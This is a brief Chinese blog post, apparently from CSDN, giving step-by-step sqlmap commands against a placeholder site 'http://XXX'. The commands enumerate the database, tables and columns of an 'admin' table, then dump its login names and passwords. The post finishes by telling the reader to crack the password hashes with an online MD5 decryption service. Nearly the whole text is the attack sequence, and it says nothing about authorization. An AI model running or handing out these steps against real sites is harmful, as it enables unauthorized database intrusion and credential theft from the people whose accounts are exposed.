版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_23306363/article/details/83090066
第一步:
安装Python, 安装完成将sqlmap文件夹解压放到C:\Python27\下面。
附件(Python2.7.1安装包+sqlmap包):
https://download.csdn.net/download/qq_23306363/10724195
第二步:
1)win+R,输入cmd,输入 cd c:\ 进入c盘
2)确定网址:如"http://XXX"
3)输入Python27\sqlmap\sqlmap.py -u"http://XXX" --forms
4)Python27\sqlmap\sqlmap.py -u “http://XXX” --forms --dbms mysql --current-db 找到当前的库名称,如:BaseA
5)Python27\sqlmap\sqlmap.py -u “http://XXX” --forms --dbms mysql -D BaseA --tables 找到所有的表,比如有: admin,student,classes
6)Python27\sqlmap\sqlmap.py -u"http://XXX"–forms --dbms mysql -D BaseA -T admin --columns 找到admin表的所有字段,如 name,pwd
7)Python27\sqlmap\sqlmap.py -u"http://XXX" --forms --dbms mysql -D BaseA -T admin -C name,pwd --dump 显示出该表所有登录名及密码
8)拷贝出pwd百度MD5在线解密,即可查出pwd.